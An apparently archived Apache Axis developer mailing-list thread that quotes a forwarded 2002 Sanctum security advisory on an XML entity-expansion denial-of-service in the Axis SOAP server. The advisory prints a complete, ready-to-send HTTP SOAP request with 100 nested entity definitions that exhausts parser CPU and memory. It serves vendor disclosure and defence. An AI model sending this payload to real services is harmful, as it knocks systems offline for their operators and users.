I think tom fixed it (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)

Thanks,
dims

--- Ted Leung <[EMAIL PROTECTED]> wrote:
> This security alert came through today.
> 
> Ted
> ----- Original Message -----
> From: "Ian Holsman" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: "Ory Segal" <[EMAIL PROTECTED]>
> Sent: Tuesday, November 26, 2002 8:02 AM
> Subject: Security Alert - Apache/Axis
> 
> 
> > Dear [EMAIL PROTECTED],
> >
> > During a recent security audit at one of our customers, Sanctum found a
> > security vulnerability in your product Apache/Axis.
> > The details of this vulnerability are described in the attached text file.
> >
> > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > forums about this vulnerability the last week of November.  Please note,
> the
> > advisory will not contain specifics that might enable someone to exploit
> the
> > vulnerability.
> >
> > We would appreciate it if you could issue a patch in that timeline (i.e.
> > around November 25th), so it can be linked to our advisory.
> >
> > Please feel free to contact me for more information/help.
> >
> > Thanks,
> > -Amit
> >
> >  <<XML_DTD_Axis.txt>>
> >
> >
> 
> 
> ----------------------------------------------------------------------------
> ----
> 
> 
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: [EMAIL PROTECTED]
> > For additional commands, e-mail: [EMAIL PROTECTED]
> > ///////////////////////////////////////////////////////////////////////
> ========================>> Security Advisory <<========================
> ///////////////////////////////////////////////////////////////////////
> 
> 
> => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> 
> => Release date: 14/Nov/2002
> 
> => Vendor: Apache Group
> 
> The following product was found to be vulnerable: 
> 
>   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> 
> The versions affected are the latest ones (as of October 2002).
> 
> => Severity: High
> 
> => CVE candidate: Not assigned yet.
> 
> => Summary: Using the DTD part of the XML document, it is possible to cause the 
> XML parser to consume 100% CPU and/or a lot of memory, therefore resulting in 
> a denial of service condition.
> 
> => Description: The DTD part of the XML document enables the document to define 
> named entities (other than the predefined &lt;, &gt;, etc.). The entities can be
> defined using other entities (recursion is prohibited in XML 1.0). 
> Entities are expanded when they are referenced, inside the XML document. 
> The attack is comprised of defining and referencing an entity which is defined 
> using two instances of another entity, which is (in turn) defined as two instances
> of yet another entity, and so on. This definition process can be repeated as long
> as "necessary" - we found that nesting level of 100 is usually sufficient.
> The 100th entity should be defined simply as a string. This has the effect of having
> the first entity contain, in theory, 2^99 (two to the power of ninety nine) 
> concatenated values of the 100th entity.
> Here's an example (the DTD is to be placed after the XML declaration, and before the 
> root element of the XML document):
> 
>       <!DOCTYPE root [
>       <!ENTITY x100 "foobar">
>       <!ENTITY  x99 "&x100;&x100;">
>       <!ENTITY  x98 "&x99;&x99;">
>       <!ENTITY  x97 "&x98;&x98;">
>       ...
>       <!ENTITY   x3 "&x4;&x4;">
>       <!ENTITY   x2 "&x3;&x3;">
>       <!ENTITY   x1 "&x2;&x2;">
>       ]>
> 
> Referring to the first entity inside a document that would otherwise be accepted by
> the application (using the syntax &x1;), results in a DoS condition, due to the 
> excessive CPU load and/or memory load required by the XML parser to expand this 
>entity. 
> 
> => Solution: Not available yet.
> 
> => Workaround: Not available yet.
> 
> => Example:
> 
> Ory Segal from Sanctum devised a SOAP request that manages to mount this attack 
>requiring 
> only a path to an existing web service to be known to the attacker. 
> 
> The request is:
> 
> POST path_to_web_service HTTP/1.0
> Host: ...
> Content-Type: text/xml
> SOAPAction: ""
> Content-Length: 3224
> 
> <?xml version="1.0" ?>
> <!DOCTYPE foobar [
>       <!ENTITY x0 "hello">
>       <!ENTITY x1 "&x0;&x0;">
>       <!ENTITY x2 "&x1;&x1;">
>       <!ENTITY x3 "&x2;&x2;">
>       <!ENTITY x4 "&x3;&x3;">
>       <!ENTITY x5 "&x4;&x4;">
>       <!ENTITY x6 "&x5;&x5;">
>       <!ENTITY x7 "&x6;&x6;">
>       <!ENTITY x8 "&x7;&x7;">
>       <!ENTITY x9 "&x8;&x8;">
>       <!ENTITY x10 "&x9;&x9;">
>       <!ENTITY x11 "&x10;&x10;">
>       <!ENTITY x12 "&x11;&x11;">
>       <!ENTITY x13 "&x12;&x12;">
>       <!ENTITY x14 "&x13;&x13;">
>       <!ENTITY x15 "&x14;&x14;">
>       <!ENTITY x16 "&x15;&x15;">
>       <!ENTITY x17 "&x16;&x16;">
>       <!ENTITY x18 "&x17;&x17;">
>       <!ENTITY x19 "&x18;&x18;">
>       <!ENTITY x20 "&x19;&x19;">
>       <!ENTITY x21 "&x20;&x20;">
>       <!ENTITY x22 "&x21;&x21;">
>       <!ENTITY x23 "&x22;&x22;">
>       <!ENTITY x24 "&x23;&x23;">
>       <!ENTITY x25 "&x24;&x24;">
>       <!ENTITY x26 "&x25;&x25;">
>       <!ENTITY x27 "&x26;&x26;">
>       <!ENTITY x28 "&x27;&x27;">
>       <!ENTITY x29 "&x28;&x28;">
>       <!ENTITY x30 "&x29;&x29;">
>       <!ENTITY x31 "&x30;&x30;">
>       <!ENTITY x32 "&x31;&x31;">
>       <!ENTITY x33 "&x32;&x32;">
>       <!ENTITY x34 "&x33;&x33;">
>       <!ENTITY x35 "&x34;&x34;">
>       <!ENTITY x36 "&x35;&x35;">
>       <!ENTITY x37 "&x36;&x36;">
>       <!ENTITY x38 "&x37;&x37;">
>       <!ENTITY x39 "&x38;&x38;">
>       <!ENTITY x40 "&x39;&x39;">
>       <!ENTITY x41 "&x40;&x40;">
>       <!ENTITY x42 "&x41;&x41;">
>       <!ENTITY x43 "&x42;&x42;">
>       <!ENTITY x44 "&x43;&x43;">
>       <!ENTITY x45 "&x44;&x44;">
>       <!ENTITY x46 "&x45;&x45;">
>       <!ENTITY x47 "&x46;&x46;">
>       <!ENTITY x48 "&x47;&x47;">
>       <!ENTITY x49 "&x48;&x48;">
>       <!ENTITY x50 "&x49;&x49;">
>       <!ENTITY x51 "&x50;&x50;">
>       <!ENTITY x52 "&x51;&x51;">
>       <!ENTITY x53 "&x52;&x52;">
>       <!ENTITY x54 "&x53;&x53;">
>       <!ENTITY x55 "&x54;&x54;">
>       <!ENTITY x56 "&x55;&x55;">
>       <!ENTITY x57 "&x56;&x56;">
>       <!ENTITY x58 "&x57;&x57;">
>       <!ENTITY x59 "&x58;&x58;">
>       <!ENTITY x60 "&x59;&x59;">
>       <!ENTITY x61 "&x60;&x60;">
>       <!ENTITY x62 "&x61;&x61;">
>       <!ENTITY x63 "&x62;&x62;">
>       <!ENTITY x64 "&x63;&x63;">
>       <!ENTITY x65 "&x64;&x64;">
>       <!ENTITY x66 "&x65;&x65;">
>       <!ENTITY x67 "&x66;&x66;">
>       <!ENTITY x68 "&x67;&x67;">
>       <!ENTITY x69 "&x68;&x68;">
>       <!ENTITY x70 "&x69;&x69;">
>       <!ENTITY x71 "&x70;&x70;">
>       <!ENTITY x72 "&x71;&x71;">
>       <!ENTITY x73 "&x72;&x72;">
>       <!ENTITY x74 "&x73;&x73;">
>       <!ENTITY x75 "&x74;&x74;">
>       <!ENTITY x76 "&x75;&x75;">
>       <!ENTITY x77 "&x76;&x76;">
>       <!ENTITY x78 "&x77;&x77;">
>       <!ENTITY x79 "&x78;&x78;">
>       <!ENTITY x80 "&x79;&x79;">
>       <!ENTITY x81 "&x80;&x80;">
>       <!ENTITY x82 "&x81;&x81;">
>       <!ENTITY x83 "&x82;&x82;">
>       <!ENTITY x84 "&x83;&x83;">
>       <!ENTITY x85 "&x84;&x84;">
>       <!ENTITY x86 "&x85;&x85;">
>       <!ENTITY x87 "&x86;&x86;">
>       <!ENTITY x88 "&x87;&x87;">
>       <!ENTITY x89 "&x88;&x88;">
>       <!ENTITY x90 "&x89;&x89;">
>       <!ENTITY x91 "&x90;&x90;">
>       <!ENTITY x92 "&x91;&x91;">
>       <!ENTITY x93 "&x92;&x92;">
>       <!ENTITY x94 "&x93;&x93;">
>       <!ENTITY x95 "&x94;&x94;">
>       <!ENTITY x96 "&x95;&x95;">
>       <!ENTITY x97 "&x96;&x96;">
>       <!ENTITY x98 "&x97;&x97;">
>       <!ENTITY x99 "&x98;&x98;">
>       <!ENTITY x100 "&x99;&x99;">
> ]>
> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
> xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance";
> xmlns:xsd="http://www.w3.org/1999/XMLSchema";>
> <SOAP-ENV:Body>
> <ns1:aaa xmlns:ns1="urn:aaa" 
>SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/";>
> <foobar xsi:type="xsd:string">&x100;</foobar>
> </ns1:aaa>
> </SOAP-ENV:Body>
> </SOAP-ENV:Envelope>
> 
> 


=====
Davanum Srinivas - http://xml.apache.org/~dims/

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

Reply via email to